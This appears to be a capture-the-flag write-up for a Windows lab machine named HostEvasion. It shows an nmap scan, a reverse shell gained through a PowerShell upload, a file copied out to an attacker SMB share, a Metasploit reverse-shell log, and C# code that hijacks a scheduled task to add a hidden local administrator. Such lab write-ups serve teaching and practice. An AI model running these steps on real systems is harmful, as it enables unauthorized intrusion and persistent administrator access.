Initial access

We start by running an nmap scan to identify open ports on the target machine.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
Nmap scan report for 10.10.145.204
Host is up (0.068s latency).
Not shown: 994 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2025-06-26T14:08:53+00:00; +1s from scanner time.
| rdp-ntlm-info:
| Target_Name: HOSTEVASION
| NetBIOS_Domain_Name: HOSTEVASION
| NetBIOS_Computer_Name: HOSTEVASION
| DNS_Domain_Name: HostEvasion
| DNS_Computer_Name: HostEvasion
| Product_Version: 10.0.17763
|_ System_Time: 2025-06-26T14:08:13+00:00
| ssl-cert: Subject: commonName=HostEvasion
| Not valid before: 2025-06-25T14:03:17
|Not valid after: 2025-12-25T14:03:17
8000/tcp open http PHP cli server 5.5 or later
|_http-title: 404 Not Found
8080/tcp open http Apache httpd 2.4.56 ((Win64) OpenSSL/1.1.1t PHP/8.0.28)
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: PowerShell Script Analyser
8443/tcp open ssl/http Apache httpd 2.4.56 ((Win64) OpenSSL/1.1.1t PHP/8.0.28)
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
| tls-alpn:
|http/1.1
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|Not valid after: 2019-11-08T23:48:47
|_http-title: PowerShell Script Analyser
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1s, deviation: 0s, median: 1s
| smb2-time:
| date: 2025-06-26T14:08:14
|start_date: N/A
| smb2-security-mode:
| 3:1:1:
|Message signing enabled but not required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 74.37 seconds

The scan identified that the server was hosting a web site that allows the analysis of powershell scripts supplied to it.

By uploading a powershell script to obtain a reverse shell, you gain direct remote access to the machine.

Encoded user flag

An attempt to retrieve the user flag reveals that it contains a base64 encoded string.

1
2
3
cat encodedflag
-----BEGIN CERTIFICATE----- WW91IGNhbiBnZXQgdGhlIGZsYWcgYnkgdmlzaXRpbmcgdGhlIGxpbmsgaHR0cDov LzxJUF9PRl9USElTX1BDPjo4MDAwL2FzZGFzZGFkYXNkamFramRuc2Rmc2Rmcy5w aHA= -----END CERTIFICATE-----

Decoding the file reveals the existence of a hidden endpoint on the website.

1
2
3
┌──(kali㉿kali)-[~/ctf/thm]
└─$ echo -n "WW91IGNhbiBnZXQgdGhlIGZsYWcgYnkgdmlzaXRpbmcgdGhlIGxpbmsgaHR0cDovLzxJUF9PRl9USElTX1BDPjo4MDAwL2FzZGFzZGFkYXNkamFramRuc2Rmc2Rmcy5waHA=" | base64 -d
You can get the flag by visiting the link http://<IP_OF_THIS_PC>:8000/asdasdadasdjakjdnsdfsdfs.php

Accessing the latter, we learn that to retrieve the flag, the log files must be deleted.

By browsing the machine and analyzing the script which analyzed the uploader files, we discover that the logs are stored in the following directory:

1
C:\xampp\htdocs\uploads

By deleting them and returning to the web page, we can retrieve the flag.

Modification of a scheduled task

To fully compromise the machine, I started by enumerating its configurations with privesccheck, which I transferred like this:

1
2
3
4
5
New-PSDrive -Name Z -PSProvider FileSystem -Root "\10.21.110.163\share" -Credential (New-Object PSCredential('test', (ConvertTo-SecureString 'test' -AsPlainText -Force))

Copy-Item PrivescCheck_HOSTEVASION.html -Destination "Z:\"


The script tells us that we have write access to a directory containing a file that is being executed by a scheduled task.

If you replace the script with a reverse shell, you won’t be able to stabilize the connection because of the antivirus.

1
2
3
4
5
6
7
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.21.110.163:4444
[*] Command shell session 2 opened (10.21.110.163:4444 -> 10.10.204.232:50051) at 2025-06-27 18:17:44 -0400

schtasks /run /tn \MyTHMTask
SUCCESS: Attempted to run the scheduled task "\MyTHMTask".

To get around this problem, you can write a C script that will create a new user on the machine and add him/her to the local administrator group.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
using System;
using System.IO;
using System.Diagnostics;

namespace AddUser
{
    class Program
    {
        static void Main(string[] args)
        {
            try
            {
                // Batch path
                string batPath = @"C:\xampp\adduser.bat";

                // Batch content
                string batContent = "@echo off\n" +
                                    "echo --- START ADDUSER --- >> C:\xampp\adduser.log" +
                                    "net user chemse P@ssw0rd123 /add >> C:\xampp\adduser.log 2>&1\n" +
                                    "net localgroup administrators chemse /add >> C:\xampp\adduser.log 2>&1\n" +
                                    "echo --- END ADDUSER --- >> C:\xampp\adduser.log";

                // Write batch file
                File.WriteAllText(batPath, batContent);

                // Execute batch file
                Process.Start("cmd.exe", "/c " + batPath);
            }
            catch (Exception ex)
            {
                Console.WriteLine("Error : " + ex.Message);
            }
        }
    }
}

Once converted into an exe, this script added my account to the machine’s local administrator group and compromised it.

1
2
3
net users
 User accounts for \HOSTEVASION ------------------------------------------------------------------------------- Administrator chemse DefaultAccount evader Guest WDAGUtilityAccount The command completed successfully.